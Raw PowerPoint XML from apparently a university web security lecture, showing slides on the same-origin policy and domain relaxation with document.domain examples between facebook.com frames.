                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Frame A…">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BD29049-CD64-6743-99C1-2EDB4AC8EBA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419476" y="3165475"/>
            <a:ext cx="4322763" cy="132715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lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:defRPr sz="5400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t>Frame </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:defRPr sz="5400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t>Origin: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0" err="1">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>cdn.facebook.com</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="facebook.com">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BD65D97-619D-054E-BB1E-C03EA440A915}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4927134" y="2398361"/>
            <a:ext cx="2029478" cy="407804"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="5800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0" err="1"/>
              <a:t>facebook.com</a:t>
            </a:r>
            <a:endParaRPr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6AF8CB0-7092-F242-9FD1-142E336F6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These Communicate?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1742338567"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition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BA7C3D1-ADFC-2E46-A3D8-AAD73246FC5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="2014194"/>
            <a:ext cx="59137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change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>document.domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> to super-domain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A7A9211-3DD0-DB4A-96A9-C4AAE5719BDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1125957" y="3200400"/>
            <a:ext cx="7081234" cy="22236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763">
              <a:spcBef>
                <a:spcPts val="2625"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>a.domain.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>  →  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>domain.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="4763">
              <a:spcBef>
                <a:spcPts val="1688"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>b.domain.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>  →  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>domain.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="4763">
              <a:spcBef>
                <a:spcPts val="1688"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>a.domain.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>  →  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>com		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NOT OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="4763">
              <a:spcBef>
                <a:spcPts val="1688"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>a.domain.co.uk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>co.uk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NOT OK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89D0677-6ECA-B843-945D-B6A984C5C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Domain Relaxation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22521981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AC853-97C2-704A-B894-A3CA4720E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HTTP/2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8145316B-43DB-9F46-A27D-4F75FBCA30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2014194"/>
            <a:ext cx="8538945" cy="3913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28667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6AF8CB0-7092-F242-9FD1-142E336F6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Domain Relaxation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Group">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3852D26E-CEE4-2B4D-8F89-51966CF7D174}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3132139" y="2244725"/>
            <a:ext cx="5927725" cy="3168650"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="15805531" cy="8452748"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="22" name="Group">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2033E7E-31D5-9F48-8BE6-481FDE052D0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0"/>
              <a:ext cx="15805532" cy="8452749"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="15805531" cy="8452748"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="Rounded Rectangle">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93F88253-408A-5849-B08D-AC8E72E1E711}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="15805531" cy="8452748"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 4020"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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>
                <a:outerShdw blurRad="50800" dist="25400" dir="3600000" rotWithShape="0">
                  <a:srgbClr val="000000">
                    <a:alpha val="70000"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="219075">
                  <a:defRPr sz="4000" b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15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  <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="32" name="Shape">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6C97ECB-4889-C94E-95BB-F91CCC260E54}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="67726" y="38115"/>
                <a:ext cx="15670079" cy="178286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0" y="4117"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2980"/>
                      <a:pt x="52" y="1951"/>
                      <a:pt x="136" y="1206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="220" y="461"/>
                      <a:pt x="336" y="0"/>
                      <a:pt x="464" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="21136" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21264" y="0"/>
                      <a:pt x="21380" y="461"/>
                      <a:pt x="21464" y="1206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21548" y="1951"/>
                      <a:pt x="21600" y="2980"/>
                      <a:pt x="21600" y="4117"/>
                    </a:cubicBez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DCDEE0"/>
              </a:solidFill>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="219075">
                  <a:defRPr sz="3900" b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1463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p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="23" name="Group">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B83FDC6-54C5-8642-B538-377A5124BBD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7797" y="770587"/>
              <a:ext cx="1446117" cy="281529"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="1446116" cy="281528"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="28" name="Oval">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FD5C30B-D2EA-A448-9CD9-98DE85533FE6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1159158" y="155"/>
                <a:ext cx="287835" cy="279498"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="00882B"/>
              </a:solidFill>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="219075">
                  <a:defRPr sz="4000" b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15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  <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29" name="Oval">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBD44359-EBA7-6842-BD97-13AC81C84639}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="579254" y="155"/>
                <a:ext cx="287835" cy="279498"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="F5D328"/>
              </a:solidFill>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="219075">
                  <a:defRPr sz="4000" b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15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  <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30" name="Oval">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{611DC1C5-1CC9-8E41-882B-C2483535AB7D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="-648" y="155"/>
                <a:ext cx="287835" cy="279498"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="C82506"/>
              </a:solidFill>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="219075">
                  <a:defRPr sz="4000" b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15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p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="24" name="Group">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{647E57A8-42D6-914F-ABBD-37FC4BA36B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368043" y="218002"/>
              <a:ext cx="12651290" cy="1350113"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="12651289" cy="1350111"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="25" name="Rectangle">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86ABA66A-FF8D-FE4E-864D-D65DF0214F42}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="-1872" y="252065"/>
                <a:ext cx="12652044" cy="876610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lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="219075">
                  <a:defRPr sz="4000" b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15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  <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="26" name="Image" descr="Image">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CECE3859-751D-2B41-8D4D-F425AD8F7C8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861276" y="408056"/>
                <a:ext cx="649043" cy="5705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400000"/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a14:hiddenLine>
                </a:ext>
              </a:extLst>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="http://example.com">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F786132C-D909-DB43-855D-5290ADCCB7B2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="226703" y="-2025"/>
                <a:ext cx="10899636" cy="135091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lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
              <a:lstStyle>
                <a:lvl1pPr algn="l" defTabSz="584200">
                  <a:defRPr sz="1000" b="0">
                    <a:solidFill>
                      <a:srgbClr val="A6AAA9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>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr sz="375">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>http://example.com</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Frame: stanford.edu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D902DE6A-0718-9A4C-A3D0-D218BFA80ED9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419475" y="3165476"/>
            <a:ext cx="5151438" cy="728663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:defRPr sz="540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r>
              <a:rPr lang="en-US" sz="2025" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2025" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Frame: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cdn.facebook.com</a:t>
            </a:r>
            <a:endParaRPr sz="2025" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="cs155.stanford.edu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE0B0A78-3DB1-314D-BDC9-C8988A74DE30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4033243" y="2376372"/>
            <a:ext cx="1683153" cy="373179"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="5800" u="sng">
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2175" dirty="0"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facebook.com</a:t>
            </a:r>
            <a:endParaRPr sz="2175" dirty="0">
              <a:hlinkClick r:id="" action="ppaction://noaction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35" name="&lt;script&gt;…">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6963969-F0A5-7A45-A7AC-D0E8E4D48AC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3432175" y="4175024"/>
            <a:ext cx="5014193" cy="973343"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5400">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2025" dirty="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5400">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2025" dirty="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2025" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>document.domain</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2025" dirty="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2025" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>com</a:t>
            </a:r>
            <a:endParaRPr sz="2025" dirty="0">
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5400">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2025" dirty="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2753398542"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition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6AF8CB0-7092-F242-9FD1-142E336F6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About This?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Group">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A91D030D-71BD-ED45-A714-B43311A2ABCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3132139" y="2244725"/>
            <a:ext cx="5927725" cy="3168650"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="15805531" cy="8452748"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="22" name="Group">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
